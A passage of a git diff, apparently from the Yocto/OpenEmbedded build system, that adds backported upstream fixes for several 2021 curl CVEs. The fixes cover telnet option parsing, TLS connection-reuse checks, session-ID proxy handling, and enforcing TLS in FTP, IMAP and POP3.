+ struct curl_schannel_cred *old_cred = NULL;
+
+ Curl_ssl_sessionid_lock(conn);
+- incache = !(Curl_ssl_getsessionid(conn, (void **)&old_cred, NULL,
++ incache = !(Curl_ssl_getsessionid(conn, isproxy, (void **)&old_cred, NULL,
+ sockindex));
+ if(incache) {
+ if(old_cred != BACKEND->cred) {
+@@ -1280,7 +1282,7 @@ schannel_connect_step3(struct connectdata *conn, int sockindex)
+ }
+ }
+ if(!incache) {
+- result = Curl_ssl_addsessionid(conn, (void *)BACKEND->cred,
++ result = Curl_ssl_addsessionid(conn, isproxy, (void *)BACKEND->cred,
+ sizeof(struct curl_schannel_cred),
+ sockindex);
+ if(result) {
+diff --git a/lib/vtls/sectransp.c b/lib/vtls/sectransp.c
+index 7dd028fb7..9c67d465a 100644
+--- a/lib/vtls/sectransp.c
++++ b/lib/vtls/sectransp.c
+@@ -1376,7 +1376,8 @@ static CURLcode sectransp_connect_step1(struct connectdata *conn,
+ const char * const ssl_cafile = SSL_CONN_CONFIG(CAfile);
+ const bool verifypeer = SSL_CONN_CONFIG(verifypeer);
+ char * const ssl_cert = SSL_SET_OPTION(cert);
+- const char * const hostname = SSL_IS_PROXY() ? conn->http_proxy.host.name :
++ bool isproxy = SSL_IS_PROXY();
++ const char * const hostname = isproxy ? conn->http_proxy.host.name :
+ conn->host.name;
+ const long int port = SSL_IS_PROXY() ? conn->port : conn->remote_port;
+ #ifdef ENABLE_IPV6
+@@ -1584,7 +1585,7 @@ static CURLcode sectransp_connect_step1(struct connectdata *conn,
+
+ #ifdef USE_NGHTTP2
+ if(data->set.httpversion >= CURL_HTTP_VERSION_2 &&
+- (!SSL_IS_PROXY() || !conn->bits.tunnel_proxy)) {
++ (!isproxy || !conn->bits.tunnel_proxy)) {
+ CFArrayAppendValue(alpnArr, CFSTR(NGHTTP2_PROTO_VERSION_ID));
+ infof(data, "ALPN, offering %s\n", NGHTTP2_PROTO_VERSION_ID);
+ }
+@@ -1916,7 +1917,7 @@ static CURLcode sectransp_connect_step1(struct connectdata *conn,
+ size_t ssl_sessionid_len;
+
+ Curl_ssl_sessionid_lock(conn);
+- if(!Curl_ssl_getsessionid(conn, (void **)&ssl_sessionid,
++ if(!Curl_ssl_getsessionid(conn, isproxy, (void **)&ssl_sessionid,
+ &ssl_sessionid_len, sockindex)) {
+ /* we got a session id, use it! */
+ err = SSLSetPeerID(BACKEND->ssl_ctx, ssl_sessionid, ssl_sessionid_len);
+@@ -1944,7 +1945,7 @@ static CURLcode sectransp_connect_step1(struct connectdata *conn,
+ return CURLE_SSL_CONNECT_ERROR;
+ }
+
+- result = Curl_ssl_addsessionid(conn, ssl_sessionid, ssl_sessionid_len,
++ result = Curl_ssl_addsessionid(conn, isproxy, ssl_sessionid, ssl_sessionid_len,
+ sockindex);
+ Curl_ssl_sessionid_unlock(conn);
+ if(result) {
+diff --git a/lib/vtls/vtls.c b/lib/vtls/vtls.c
+index dfefa1bd5..aaf73ef8f 100644
+--- a/lib/vtls/vtls.c
++++ b/lib/vtls/vtls.c
+@@ -305,6 +305,7 @@ void Curl_ssl_sessionid_unlock(struct connectdata *conn)
+ * there's one suitable, it is provided. Returns TRUE when no entry matched.
+ */
+ bool Curl_ssl_getsessionid(struct connectdata *conn,
++ const bool isProxy,
+ void **ssl_sessionid,
+ size_t *idsize, /* set 0 if unknown */
+ int sockindex)
+@@ -315,7 +316,6 @@ bool Curl_ssl_getsessionid(struct connectdata *conn,
+ long *general_age;
+ bool no_match = TRUE;
+
+- const bool isProxy = CONNECT_PROXY_SSL();
+ struct ssl_primary_config * const ssl_config = isProxy ?
+ &conn->proxy_ssl_config :
+ &conn->ssl_config;
+@@ -324,6 +324,11 @@ bool Curl_ssl_getsessionid(struct connectdata *conn,
+ int port = isProxy ? (int)conn->port : conn->remote_port;
+ *ssl_sessionid = NULL;
+
++#ifdef CURL_DISABLE_PROXY
++ if(isProxy)
++ return TRUE;
++#endif
++
+ DEBUGASSERT(SSL_SET_OPTION(primary.sessionid));
+
+ if(!SSL_SET_OPTION(primary.sessionid))
+@@ -411,6 +416,7 @@ void Curl_ssl_delsessionid(struct connectdata *conn, void *ssl_sessionid)
+ * later on.
+ */
+ CURLcode Curl_ssl_addsessionid(struct connectdata *conn,
++ bool isProxy,
+ void *ssl_sessionid,
+ size_t idsize,
+ int sockindex)
+@@ -423,7 +429,6 @@ CURLcode Curl_ssl_addsessionid(struct connectdata *conn,
+ char *clone_conn_to_host;
+ int conn_to_port;
+ long *general_age;
+- const bool isProxy = CONNECT_PROXY_SSL();
+ struct ssl_primary_config * const ssl_config = isProxy ?
+ &conn->proxy_ssl_config :
+ &conn->ssl_config;
+diff --git a/lib/vtls/vtls.h b/lib/vtls/vtls.h
+index a81b2f22d..a5e348752 100644
+--- a/lib/vtls/vtls.h
++++ b/lib/vtls/vtls.h
+@@ -202,6 +202,7 @@ void Curl_ssl_sessionid_unlock(struct connectdata *conn);
+ * under sessionid mutex).
+ */
+ bool Curl_ssl_getsessionid(struct connectdata *conn,
++ const bool isproxy,
+ void **ssl_sessionid,
+ size_t *idsize, /* set 0 if unknown */
+ int sockindex);
+@@ -211,6 +212,7 @@ bool Curl_ssl_getsessionid(struct connectdata *conn,
+ * object with cache (e.g. incrementing refcount on success)
+ */
+ CURLcode Curl_ssl_addsessionid(struct connectdata *conn,
++ const bool isProxy,
+ void *ssl_sessionid,
+ size_t idsize,
+ int sockindex);
+diff --git a/lib/vtls/wolfssl.c b/lib/vtls/wolfssl.c
+index 8c2d3f4a2..dd9f907ff 100644
+--- a/lib/vtls/wolfssl.c
++++ b/lib/vtls/wolfssl.c
+@@ -392,7 +392,8 @@ wolfssl_connect_step1(struct connectdata *conn,
+ void *ssl_sessionid = NULL;
+
+ Curl_ssl_sessionid_lock(conn);
+- if(!Curl_ssl_getsessionid(conn, &ssl_sessionid, NULL, sockindex)) {
++ if(!Curl_ssl_getsessionid(conn, SSL_IS_PROXY() ? TRUE : FALSE,
++ &ssl_sessionid, NULL, sockindex)) {
+ /* we got a session id, use it! */
+ if(!SSL_set_session(BACKEND->handle, ssl_sessionid)) {
+ char error_buffer[WOLFSSL_MAX_ERROR_SZ];
+@@ -618,9 +619,10 @@ wolfssl_connect_step3(struct connectdata *conn,
+ void *old_ssl_sessionid = NULL;
+
+ our_ssl_sessionid = SSL_get_session(BACKEND->handle);
++ bool isproxy = SSL_IS_PROXY() ? TRUE : FALSE;
+
+ Curl_ssl_sessionid_lock(conn);
+- incache = !(Curl_ssl_getsessionid(conn, &old_ssl_sessionid, NULL,
++ incache = !(Curl_ssl_getsessionid(conn, isproxy, &old_ssl_sessionid, NULL,
+ sockindex));
+ if(incache) {
+ if(old_ssl_sessionid != our_ssl_sessionid) {
+@@ -631,7 +633,7 @@ wolfssl_connect_step3(struct connectdata *conn,
+ }
+
+ if(!incache) {
+- result = Curl_ssl_addsessionid(conn, our_ssl_sessionid,
++ result = Curl_ssl_addsessionid(conn, isproxy, our_ssl_sessionid,
+ 0 /* unknown size */, sockindex);
+ if(result) {
+ Curl_ssl_sessionid_unlock(conn);
+--
+2.20.1
+
diff --git a/meta/recipes-support/curl/curl/CVE-2021-22898.patch b/meta/recipes-support/curl/curl/CVE-2021-22898.patch
new file mode 100644
index 0000000000..0800e10175
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2021-22898.patch
@@ -0,0 +1,26 @@
+From 39ce47f219b09c380b81f89fe54ac586c8db6bde Mon Sep 17 00:00:00 2001
+From: Harry Sintonen <sintonen@iki.fi>
+Date: Fri, 7 May 2021 13:09:57 +0200
+Subject: [PATCH] telnet: check sscanf() for correct number of matches
+
+CVE: CVE-2021-22898
+Upstream-Status: Backport
+Link: https://github.com/curl/curl/commit/39ce47f219b09c380b81f89fe54ac586c8db6bde
+Bug: https://curl.se/docs/CVE-2021-22898.html
+---
+ lib/telnet.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/lib/telnet.c b/lib/telnet.c
+index 26e0658ba9cc..fdd137fb0c04 100644
+--- a/lib/telnet.c
++++ b/lib/telnet.c
+@@ -922,7 +922,7 @@ static void suboption(struct Curl_easy *data)
+ size_t tmplen = (strlen(v->data) + 1);
+ /* Add the variable only if it fits */
+ if(len + tmplen < (int)sizeof(temp)-6) {
+- if(sscanf(v->data, "%127[^,],%127s", varname, varval)) {
++ if(sscanf(v->data, "%127[^,],%127s", varname, varval) == 2) {
+ msnprintf((char *)&temp[len], sizeof(temp) - len,
+ "%c%s%c%s", CURL_NEW_ENV_VAR, varname,
+ CURL_NEW_ENV_VALUE, varval);
diff --git a/meta/recipes-support/curl/curl/CVE-2021-22924.patch b/meta/recipes-support/curl/curl/CVE-2021-22924.patch
new file mode 100644
index 0000000000..68fde45ddf
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2021-22924.patch
@@ -0,0 +1,226 @@
+Subject: [PATCH] vtls: fix connection reuse checks for issuer cert and
+ case sensitivity CVE-2021-22924
+
+Reported-by: Harry Sintonen
+Bug: https://curl.se/docs/CVE-2021-22924.html
+CVE: CVE-2021-22924
+Upstream-Status: backport from Ubuntu curl_7.68.0-1ubuntu2.6
+Signed-off-by: Mike Crowe <mac@mcrowe.com>
+---
+ lib/url.c | 5 +++--
+ lib/urldata.h | 2 +-
+ lib/vtls/gtls.c | 10 +++++-----
+ lib/vtls/nss.c | 4 ++--
+ lib/vtls/openssl.c | 12 ++++++------
+ lib/vtls/vtls.c | 23 ++++++++++++++++++-----
+ 6 files changed, 35 insertions(+), 21 deletions(-)
+
+diff --git a/lib/url.c b/lib/url.c
+index 47fc66aed..eebad8d32 100644
+--- a/lib/url.c
++++ b/lib/url.c
+@@ -3555,6 +3555,9 @@ static CURLcode create_conn(struct Curl_easy *data,
+ data->set.proxy_ssl.primary.CApath = data->set.str[STRING_SSL_CAPATH_PROXY];
+ data->set.ssl.primary.CAfile = data->set.str[STRING_SSL_CAFILE_ORIG];
+ data->set.proxy_ssl.primary.CAfile = data->set.str[STRING_SSL_CAFILE_PROXY];
++ data->set.ssl.primary.issuercert = data->set.str[STRING_SSL_ISSUERCERT_ORIG];
++ data->set.proxy_ssl.primary.issuercert =
++ data->set.str[STRING_SSL_ISSUERCERT_PROXY];
+ data->set.ssl.primary.random_file = data->set.str[STRING_SSL_RANDOM_FILE];
+ data->set.proxy_ssl.primary.random_file =
+ data->set.str[STRING_SSL_RANDOM_FILE];
+@@ -3575,8 +3578,6 @@ static CURLcode create_conn(struct Curl_easy *data,
+
+ data->set.ssl.CRLfile = data->set.str[STRING_SSL_CRLFILE_ORIG];
+ data->set.proxy_ssl.CRLfile = data->set.str[STRING_SSL_CRLFILE_PROXY];
+- data->set.ssl.issuercert = data->set.str[STRING_SSL_ISSUERCERT_ORIG];
+- data->set.proxy_ssl.issuercert = data->set.str[STRING_SSL_ISSUERCERT_PROXY];
+ data->set.ssl.cert = data->set.str[STRING_CERT_ORIG];
+ data->set.proxy_ssl.cert = data->set.str[STRING_CERT_PROXY];
+ data->set.ssl.cert_type = data->set.str[STRING_CERT_TYPE_ORIG];
+diff --git a/lib/urldata.h b/lib/urldata.h
+index fbb8b645e..615fbf369 100644
+--- a/lib/urldata.h
++++ b/lib/urldata.h
+@@ -224,6 +224,7 @@ struct ssl_primary_config {
+ long version_max; /* max supported version the client wants to use*/
+ char *CApath; /* certificate dir (doesn't work on windows) */
+ char *CAfile; /* certificate to verify peer against */
++ char *issuercert; /* optional issuer certificate filename */
+ char *clientcert;
+ char *random_file; /* path to file containing "random" data */
+ char *egdsocket; /* path to file containing the EGD daemon socket */
+@@ -240,7 +241,6 @@ struct ssl_config_data {
+ struct ssl_primary_config primary;
+ long certverifyresult; /* result from the certificate verification */
+ char *CRLfile; /* CRL to check certificate revocation */
+- char *issuercert;/* optional issuer certificate filename */
+ curl_ssl_ctx_callback fsslctx; /* function to initialize ssl ctx */
+ void *fsslctxp; /* parameter for call back */
+ char *cert; /* client certificate file name */
+diff --git a/lib/vtls/gtls.c b/lib/vtls/gtls.c
+index 46e149c7d..8c051024f 100644
+--- a/lib/vtls/gtls.c
++++ b/lib/vtls/gtls.c
+@@ -1059,7 +1059,7 @@ gtls_connect_step3(struct connectdata *conn,
+ if(!chainp) {
+ if(SSL_CONN_CONFIG(verifypeer) ||
+ SSL_CONN_CONFIG(verifyhost) ||
+- SSL_SET_OPTION(issuercert)) {
++ SSL_CONN_CONFIG(issuercert)) {
+ #ifdef USE_TLS_SRP
+ if(SSL_SET_OPTION(authtype) == CURL_TLSAUTH_SRP
+ && SSL_SET_OPTION(username) != NULL
+@@ -1241,21 +1241,21 @@ gtls_connect_step3(struct connectdata *conn,
+ gnutls_x509_crt_t format */
+ gnutls_x509_crt_import(x509_cert, chainp, GNUTLS_X509_FMT_DER);
+
+- if(SSL_SET_OPTION(issuercert)) {
++ if(SSL_CONN_CONFIG(issuercert)) {
+ gnutls_x509_crt_init(&x509_issuer);
+- issuerp = load_file(SSL_SET_OPTION(issuercert));
++ issuerp = load_file(SSL_CONN_CONFIG(issuercert));
+ gnutls_x509_crt_import(x509_issuer, &issuerp, GNUTLS_X509_FMT_PEM);
+ rc = gnutls_x509_crt_check_issuer(x509_cert, x509_issuer);
+ gnutls_x509_crt_deinit(x509_issuer);
+ unload_file(issuerp);
+ if(rc <= 0) {
+ failf(data, "server certificate issuer check failed (IssuerCert: %s)",
+- SSL_SET_OPTION(issuercert)?SSL_SET_OPTION(issuercert):"none");
++ SSL_CONN_CONFIG(issuercert)?SSL_CONN_CONFIG(issuercert):"none");
+ gnutls_x509_crt_deinit(x509_cert);
+ return CURLE_SSL_ISSUER_ERROR;
+ }
+ infof(data, "\t server certificate issuer check OK (Issuer Cert: %s)\n",
+- SSL_SET_OPTION(issuercert)?SSL_SET_OPTION(issuercert):"none");
++ SSL_CONN_CONFIG(issuercert)?SSL_CONN_CONFIG(issuercert):"none");
+ }
+
+ size = sizeof(certbuf);
+diff --git a/lib/vtls/nss.c b/lib/vtls/nss.c
+index ef51b0d91..375c78b1b 100644
+--- a/lib/vtls/nss.c
++++ b/lib/vtls/nss.c
+@@ -2151,9 +2151,9 @@ static CURLcode nss_do_connect(struct connectdata *conn, int sockindex)
+ if(result)
+ goto error;
+
+- if(SSL_SET_OPTION(issuercert)) {
++ if(SSL_CONN_CONFIG(issuercert)) {
+ SECStatus ret = SECFailure;
+- char *nickname = dup_nickname(data, SSL_SET_OPTION(issuercert));
++ char *nickname = dup_nickname(data, SSL_CONN_CONFIG(issuercert));
+ if(nickname) {
+ /* we support only nicknames in case of issuercert for now */
+ ret = check_issuer_cert(BACKEND->handle, nickname);
+diff --git a/lib/vtls/openssl.c b/lib/vtls/openssl.c
+index 64f43605a..7e81fd3a0 100644
+--- a/lib/vtls/openssl.c
++++ b/lib/vtls/openssl.c
+@@ -3547,7 +3547,7 @@ static CURLcode servercert(struct connectdata *conn,
+ deallocating the certificate. */
+
+ /* e.g. match issuer name with provided issuer certificate */
+- if(SSL_SET_OPTION(issuercert)) {
++ if(SSL_CONN_CONFIG(issuercert)) {
+ fp = BIO_new(BIO_s_file());
+ if(fp == NULL) {
+ failf(data,
+@@ -3560,10 +3560,10 @@ static CURLcode servercert(struct connectdata *conn,
+ return CURLE_OUT_OF_MEMORY;
+ }
+
+- if(BIO_read_filename(fp, SSL_SET_OPTION(issuercert)) <= 0) {
++ if(BIO_read_filename(fp, SSL_CONN_CONFIG(issuercert)) <= 0) {
+ if(strict)
+ failf(data, "SSL: Unable to open issuer cert (%s)",
+- SSL_SET_OPTION(issuercert));
++ SSL_CONN_CONFIG(issuercert));
+ BIO_free(fp);
+ X509_free(BACKEND->server_cert);
+ BACKEND->server_cert = NULL;
+@@ -3574,7 +3574,7 @@ static CURLcode servercert(struct connectdata *conn,
+ if(!issuer) {
+ if(strict)
+ failf(data, "SSL: Unable to read issuer cert (%s)",
+- SSL_SET_OPTION(issuercert));
++ SSL_CONN_CONFIG(issuercert));
+ BIO_free(fp);
+ X509_free(issuer);
+ X509_free(BACKEND->server_cert);
+@@ -3585,7 +3585,7 @@ static CURLcode servercert(struct connectdata *conn,
+ if(X509_check_issued(issuer, BACKEND->server_cert) != X509_V_OK) {
+ if(strict)
+ failf(data, "SSL: Certificate issuer check failed (%s)",
+- SSL_SET_OPTION(issuercert));
++ SSL_CONN_CONFIG(issuercert));
+ BIO_free(fp);
+ X509_free(issuer);
+ X509_free(BACKEND->server_cert);
+@@ -3594,7 +3594,7 @@ static CURLcode servercert(struct connectdata *conn,
+ }
+
+ infof(data, " SSL certificate issuer check ok (%s)\n",
+- SSL_SET_OPTION(issuercert));
++ SSL_CONN_CONFIG(issuercert));
+ BIO_free(fp);
+ X509_free(issuer);
+ }
+diff --git a/lib/vtls/vtls.c b/lib/vtls/vtls.c
+index aaf73ef8f..8c681da14 100644
+--- a/lib/vtls/vtls.c
++++ b/lib/vtls/vtls.c
+@@ -82,6 +82,16 @@
+ else \
+ dest->var = NULL;
+
++static bool safecmp(char *a, char *b)
++{
++ if(a && b)
++ return !strcmp(a, b);
++ else if(!a && !b)
++ return TRUE; /* match */
++ return FALSE; /* no match */
++}
++
++
+ bool
+ Curl_ssl_config_matches(struct ssl_primary_config* data,
+ struct ssl_primary_config* needle)
+@@ -91,11 +101,12 @@ Curl_ssl_config_matches(struct ssl_primary_config* data,
+ (data->verifypeer == needle->verifypeer) &&
+ (data->verifyhost == needle->verifyhost) &&
+ (data->verifystatus == needle->verifystatus) &&
+- Curl_safe_strcasecompare(data->CApath, needle->CApath) &&
+- Curl_safe_strcasecompare(data->CAfile, needle->CAfile) &&
+- Curl_safe_strcasecompare(data->clientcert, needle->clientcert) &&
+- Curl_safe_strcasecompare(data->random_file, needle->random_file) &&
+- Curl_safe_strcasecompare(data->egdsocket, needle->egdsocket) &&
++ safecmp(data->CApath, needle->CApath) &&
++ safecmp(data->CAfile, needle->CAfile) &&
++ safecmp(data->issuercert, needle->issuercert) &&
++ safecmp(data->clientcert, needle->clientcert) &&
++ safecmp(data->random_file, needle->random_file) &&
++ safecmp(data->egdsocket, needle->egdsocket) &&
+ Curl_safe_strcasecompare(data->cipher_list, needle->cipher_list) &&
+ Curl_safe_strcasecompare(data->cipher_list13, needle->cipher_list13) &&
+ Curl_safe_strcasecompare(data->pinned_key, needle->pinned_key))
+@@ -117,6 +128,7 @@ Curl_clone_primary_ssl_config(struct ssl_primary_config *source,
+
+ CLONE_STRING(CApath);
+ CLONE_STRING(CAfile);
++ CLONE_STRING(issuercert);
+ CLONE_STRING(clientcert);
+ CLONE_STRING(random_file);
+ CLONE_STRING(egdsocket);
+@@ -131,6 +143,7 @@ void Curl_free_primary_ssl_config(struct ssl_primary_config* sslc)
+ {
+ Curl_safefree(sslc->CApath);
+ Curl_safefree(sslc->CAfile);
++ Curl_safefree(sslc->issuercert);
+ Curl_safefree(sslc->clientcert);
+ Curl_safefree(sslc->random_file);
+ Curl_safefree(sslc->egdsocket);
+--
+2.30.2
+
diff --git a/meta/recipes-support/curl/curl/CVE-2021-22925.patch b/meta/recipes-support/curl/curl/CVE-2021-22925.patch
new file mode 100644
index 0000000000..13b55f76be
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2021-22925.patch
@@ -0,0 +1,43 @@
+Subject: [PATCH] telnet: fix option parser to not send uninitialized
+ contents CVE-2021-22925
+
+Reported-by: Red Hat Product Security
+Bug: https://curl.se/docs/CVE-2021-22925.html
+CVE: CVE-2021-22925
+Upstream-Status: backport from Ubuntu curl_7.68.0-1ubuntu2.6
+Signed-off-by: Mike Crowe <mac@mcrowe.com>
+---
+ lib/telnet.c | 17 +++++++++++------
+ 1 file changed, 11 insertions(+), 6 deletions(-)
+
+diff --git a/lib/telnet.c b/lib/telnet.c
+index 4bf4c652c..3347ad6d1 100644
+--- a/lib/telnet.c
++++ b/lib/telnet.c
+@@ -967,12 +967,17 @@ static void suboption(struct connectdata *conn)
+ size_t tmplen = (strlen(v->data) + 1);
+ /* Add the variable only if it fits */
+ if(len + tmplen < (int)sizeof(temp)-6) {
+- if(sscanf(v->data, "%127[^,],%127s", varname, varval) == 2) {
+- msnprintf((char *)&temp[len], sizeof(temp) - len,
+- "%c%s%c%s", CURL_NEW_ENV_VAR, varname,
+- CURL_NEW_ENV_VALUE, varval);
+- len += tmplen;
+- }
++ int rv;
++ char sep[2] = "";
++ varval[0] = 0;
++ rv = sscanf(v->data, "%127[^,]%1[,]%127s", varname, sep, varval);
++ if(rv == 1)
++ len += msnprintf((char *)&temp[len], sizeof(temp) - len,
++ "%c%s", CURL_NEW_ENV_VAR, varname);
++ else if(rv >= 2)
++ len += msnprintf((char *)&temp[len], sizeof(temp) - len,
++ "%c%s%c%s", CURL_NEW_ENV_VAR, varname,
++ CURL_NEW_ENV_VALUE, varval);
+ }
+ }
+ msnprintf((char *)&temp[len], sizeof(temp) - len,
+--
+2.30.2
+
diff --git a/meta/recipes-support/curl/curl/CVE-2021-22946-pre1.patch b/meta/recipes-support/curl/curl/CVE-2021-22946-pre1.patch
new file mode 100644
index 0000000000..4afd755149
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2021-22946-pre1.patch
@@ -0,0 +1,86 @@
+Backport of:
+
+From 1397a7de6e312e019a3b339f855ba0a5cafa9127 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 21 Sep 2020 09:15:51 +0200
+Subject: [PATCH] ftp: separate FTPS from FTP over "HTTPS proxy"
+
+When using HTTPS proxy, SSL is used but not in the view of the FTP
+protocol handler itself so separate the connection's use of SSL from the
+FTP control connection's sue.
+
+Reported-by: Mingtao Yang
+Fixes #5523
+Closes #6006
+
+Upstream-Status: backport from 7.68.0-1ubuntu2.7
+Signed-off-by: Mike Crowe <mac@mcrowe.com>
+---
+ lib/ftp.c | 13 ++++++-------
+ lib/urldata.h | 1 +
+ 2 files changed, 7 insertions(+), 7 deletions(-)
+
+diff --git a/lib/ftp.c b/lib/ftp.c
+index 3382772..677527f 100644
+--- a/lib/ftp.c
++++ b/lib/ftp.c
+@@ -2488,7 +2488,7 @@ static CURLcode ftp_state_loggedin(struct connectdata *conn)
+ {
+ CURLcode result = CURLE_OK;
+
+- if(conn->ssl[FIRSTSOCKET].use) {
++ if(conn->bits.ftp_use_control_ssl) {
+ /* PBSZ = PROTECTION BUFFER SIZE.
+
+ The 'draft-murray-auth-ftp-ssl' (draft 12, page 7) says:
+@@ -2633,11 +2633,8 @@ static CURLcode ftp_statemach_act(struct connectdata *conn)
+ }
+ #endif
+
+- if(data->set.use_ssl &&
+- (!conn->ssl[FIRSTSOCKET].use ||
+- (conn->bits.proxy_ssl_connected[FIRSTSOCKET] &&
+- !conn->proxy_ssl[FIRSTSOCKET].use))) {
+- /* We don't have a SSL/TLS connection yet, but FTPS is
++ if(data->set.use_ssl && !conn->bits.ftp_use_control_ssl) {
++ /* We don't have a SSL/TLS control connection yet, but FTPS is
+ requested. Try a FTPS connection now */
+
+ ftpc->count3 = 0;
+@@ -2682,6 +2679,7 @@ static CURLcode ftp_statemach_act(struct connectdata *conn)
+ result = Curl_ssl_connect(conn, FIRSTSOCKET);
+ if(!result) {
+ conn->bits.ftp_use_data_ssl = FALSE; /* clear-text data */
++ conn->bits.ftp_use_control_ssl = TRUE; /* SSL on control */
+ result = ftp_state_user(conn);
+ }
+ }
+@@ -3072,7 +3070,7 @@ static CURLcode ftp_block_statemach(struct connectdata *conn)
+ *
+ */
+ static CURLcode ftp_connect(struct connectdata *conn,
+- bool *done) /* see description above */
++ bool *done) /* see description above */
+ {
+ CURLcode result;
+ struct ftp_conn *ftpc = &conn->proto.ftpc;
+@@ -3093,6 +3091,7 @@ static CURLcode ftp_connect(struct connectdata *conn,
+ result = Curl_ssl_connect(conn, FIRSTSOCKET);
+ if(result)
+ return result;
++ conn->bits.ftp_use_control_ssl = TRUE;
+ }
+
+ Curl_pp_init(pp); /* init the generic pingpong data */
+diff --git a/lib/urldata.h b/lib/urldata.h
+index ff2d686..d1fb4a9 100644
+--- a/lib/urldata.h
++++ b/lib/urldata.h
+@@ -461,6 +461,7 @@ struct ConnectBits {
+ EPRT doesn't work we disable it for the forthcoming
+ requests */
+ BIT(ftp_use_data_ssl); /* Enabled SSL for the data connection */
++ BIT(ftp_use_control_ssl); /* Enabled SSL for the control connection */
+ #endif
+ BIT(netrc); /* name+password provided by netrc */
+ BIT(userpwd_in_url); /* name+password found in url */
diff --git a/meta/recipes-support/curl/curl/CVE-2021-22946.patch b/meta/recipes-support/curl/curl/CVE-2021-22946.patch
new file mode 100644
index 0000000000..98032d8b78
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2021-22946.patch
@@ -0,0 +1,328 @@
+Backport of:
+
+From 96d71feb27e533a8b337512841a537952916262c Mon Sep 17 00:00:00 2001
+From: Patrick Monnerat <patrick@monnerat.net>
+Date: Wed, 8 Sep 2021 11:56:22 +0200
+Subject: [PATCH] ftp,imap,pop3: do not ignore --ssl-reqd
+
+In imap and pop3, check if TLS is required even when capabilities
+request has failed.
+
+In ftp, ignore preauthentication (230 status of server greeting) if TLS
+is required.
+
+Bug: https://curl.se/docs/CVE-2021-22946.html
+Upstream-Status: backport from 7.68.0-1ubuntu2.7
+Signed-off-by: Mike Crowe <mac@mcrowe.com>
+CVE: CVE-2021-22946
+---
+ lib/ftp.c | 9 ++++---
+ lib/imap.c | 24 ++++++++----------
+ lib/pop3.c | 33 +++++++++++-------------
+ tests/data/Makefile.inc | 2 ++
+ tests/data/test984 | 56 +++++++++++++++++++++++++++++++++++++++++
+ tests/data/test985 | 54 +++++++++++++++++++++++++++++++++++++++
+ tests/data/test986 | 53 ++++++++++++++++++++++++++++++++++++++
+ 7 files changed, 195 insertions(+), 36 deletions(-)
+ create mode 100644 tests/data/test984
+ create mode 100644 tests/data/test985
+ create mode 100644 tests/data/test986
+
+diff --git a/lib/ftp.c b/lib/ftp.c
+index 677527f..91b43d8 100644
+--- a/lib/ftp.c
++++ b/lib/ftp.c
+@@ -2606,9 +2606,12 @@ static CURLcode ftp_statemach_act(struct connectdata *conn)
+ /* we have now received a full FTP server response */
+ switch(ftpc->state) {
+ case FTP_WAIT220:
+- if(ftpcode == 230)
+- /* 230 User logged in - already! */
+- return ftp_state_user_resp(conn, ftpcode, ftpc->state);
++ if(ftpcode == 230) {
++ /* 230 User logged in - already! Take as 220 if TLS required. */
++ if(data->set.use_ssl <= CURLUSESSL_TRY ||
++ conn->bits.ftp_use_control_ssl)
++ return ftp_state_user_resp(conn, ftpcode, ftpc->state);
++ }
+ else if(ftpcode != 220) {
+ failf(data, "Got a %03d ftp-server response when 220 was expected",
+ ftpcode);
+diff --git a/lib/imap.c b/lib/imap.c
+index 66172bd..9880ce1 100644
+--- a/lib/imap.c
++++ b/lib/imap.c
+@@ -917,22 +917,18 @@ static CURLcode imap_state_capability_resp(struct connectdata *conn,
+ line += wordlen;
+ }
+ }
+- else if(imapcode == IMAP_RESP_OK) {
+- if(data->set.use_ssl && !conn->ssl[FIRSTSOCKET].use) {
+- /* We don't have a SSL/TLS connection yet, but SSL is requested */
+- if(imapc->tls_supported)
+- /* Switch to TLS connection now */
+- result = imap_perform_starttls(conn);
+- else if(data->set.use_ssl == CURLUSESSL_TRY)
+- /* Fallback and carry on with authentication */
+- result = imap_perform_authentication(conn);
+- else {
+- failf(data, "STARTTLS not supported.");
+- result = CURLE_USE_SSL_FAILED;
+- }
++ else if(data->set.use_ssl && !conn->ssl[FIRSTSOCKET].use) {
++ /* PREAUTH is not compatible with STARTTLS. */
++ if(imapcode == IMAP_RESP_OK && imapc->tls_supported && !imapc->preauth) {
++ /* Switch to TLS connection now */
++ result = imap_perform_starttls(conn);
+ }
+- else
++ else if(data->set.use_ssl <= CURLUSESSL_TRY)
+ result = imap_perform_authentication(conn);
++ else {
++ failf(data, "STARTTLS not available.");
++ result = CURLE_USE_SSL_FAILED;
++ }
+ }
+ else
+ result = imap_perform_authentication(conn);
+diff --git a/lib/pop3.c b/lib/pop3.c
+index 57c1373..145b2b4 100644
+--- a/lib/pop3.c
++++ b/lib/pop3.c
+@@ -721,28 +721,23 @@ static CURLcode pop3_state_capa_resp(struct connectdata *conn, int pop3code,
+ }
+ }
+ }
+- else if(pop3code == '+') {
+- if(data->set.use_ssl && !conn->ssl[FIRSTSOCKET].use) {
+- /* We don't have a SSL/TLS connection yet, but SSL is requested */
+- if(pop3c->tls_supported)
+- /* Switch to TLS connection now */
+- result = pop3_perform_starttls(conn);
+- else if(data->set.use_ssl == CURLUSESSL_TRY)
+- /* Fallback and carry on with authentication */
+- result = pop3_perform_authentication(conn);
+- else {
+- failf(data, "STLS not supported.");
+- result = CURLE_USE_SSL_FAILED;
+- }
+- }
+- else
+- result = pop3_perform_authentication(conn);
+- }
+ else {
+ /* Clear text is supported when CAPA isn't recognised */
+- pop3c->authtypes |= POP3_TYPE_CLEARTEXT;
++ if(pop3code != '+')
++ pop3c->authtypes |= POP3_TYPE_CLEARTEXT;
+
+- result = pop3_perform_authentication(conn);
++ if(!data->set.use_ssl || conn->ssl[FIRSTSOCKET].use)
++ result = pop3_perform_authentication(conn);
++ else if(pop3code == '+' && pop3c->tls_supported)
++ /* Switch to TLS connection now */
++ result = pop3_perform_starttls(conn);
++ else if(data->set.use_ssl <= CURLUSESSL_TRY)
++ /* Fallback and carry on with authentication */
++ result = pop3_perform_authentication(conn);
++ else {
++ failf(data, "STLS not supported.");
++ result = CURLE_USE_SSL_FAILED;
++ }
+ }
+
+ return result;
+diff --git a/tests/data/Makefile.inc b/tests/data/Makefile.inc
+index f9535a6..0fa6799 100644
+--- a/tests/data/Makefile.inc
